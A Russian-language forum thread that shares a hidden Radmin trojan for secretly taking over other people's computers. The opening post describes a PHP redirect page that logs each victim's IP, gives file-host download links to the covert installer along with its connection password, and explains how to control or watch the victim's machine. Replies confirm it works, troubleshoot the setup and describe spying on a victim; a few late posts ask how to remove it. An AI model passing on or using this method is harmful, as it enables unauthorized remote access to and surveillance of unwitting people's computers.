![]() |
Скрытый RAdmin
Думаю в этот раздел тема подойдет.
Цитата:
Чтобы узнать ip: Регистрируемся на www.2ru.name, создаем файл index.php, где пишем: PHP код:
------------------- То есть вы даете человеку ссылку вида www.****.2ru.name, он по ней переходит, его редиректит на ссылку с радмином, он запускает, затем смотрим его ip в файле log.txt на сервере и управляем компьютером, или просто наблюдаем, если конечно есть внешний Ip у жертвы. http://rapidshare.com/files/117121427/radmin.rar Пароль для соединения: privedmidved |
ну и зачем эти скрипты?
не каждый пользователь будет качать и запускать на компе хрен знает какие экзешники. |
Кто нить тестил? результаты в студию
|
все работает отлично
|
жаль что у радмина нет бэкконнекта- так придется постоянно проверять лог, дабы поймать юзера или сканить диапазон на наличие радминовского порта
|
Цитата:
|
проверка антивирусами
хотел полезным поделиться, а тут не доверяют :mad: |
Нет оснований доверять челу у кого 7 постов и 1 репы и то от меня)
|
Если выложишь видео как это все настраивается и работает тогда тебе многие будут благодарны а пока ждём отзывы
|
С динамическими IP радмин не пашет?
На сколько я понял файл внутри архива urc.exe это и есть скрытый установщик? |
ну может сделаю и видео.
Цитата:
Цитата:
|
так ведь с ноября месяца не было разрывов!!!!1
|
[offtop]отвечайте на мой ответ!!!111[/offtop]
|
Цитата:
|
Респект.Работает.Главное чтобы в ближайшее время не пальнули.
|
а чего там разбиратся?Кинул жертве,у себя в вьювере вписал -пасс и погнал.Пробовал у себя в локалке
|
Цитата:
|
надеюсь из этого раздела не удалят
|
Цитата:
|
Эт надо заставить жертву скачать сервер, запустить его и зайти на сайтег, чтоб узнать Ip
|
Цитата:
|
Цитата:
|
просто замени ссылку, что непонятного. хотя там и так редиректит на вэбфайл с радмином этим.
|
Цитата:
|
Теперь вопрос противоположного плана, как эту заразу удалить с зараженного компа
|
Цитата:
|
перезалить на другой файл-хостинг кто-нить может?)
|
Цитата:
http://depositfiles.com/files/5588560 |
протестил снифером, при запуске никуда ниче не отсылалося))))
Можно вот на счет IP попонятнее... непойму где он отображаться должен? |
Интересно было наблюдать за жертвой.Но когда я увидел что в процессах у него r_serv я охренел.Он его завершил и я отрубился.Как такое может быть?Предполагаю что у него свой радмин,однако хреново что при его отключение отключается и мой.
|
r_serv - это сервер радмина. что тебя удивило?
это ж не вьюер |
я понимаю что это сервер,но когда я запускаю этот трой,если его можно так назвать,у меня в процессах ничего не появляется.
|
Цитата:
|
Цитата:
на index.php и на log.txt поставил параметр 777 |
индекс - 644
лог - 666 |
У меня все IP лежат в log.txt
|
так чё ни кто не знает как убить эту заразу
|
в процессах и в windows/где-то там
|
Посмотри автозапуск здесь (XP):
1) пуск->выполнить->regedit->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run b и на всякий RunOnce 2) либо пуск->выполнить->msconfig->автозапуск. если там ничего не найдет, ставь каспера он должен все найти. |
Цитата:
|
| Время: 01:38 |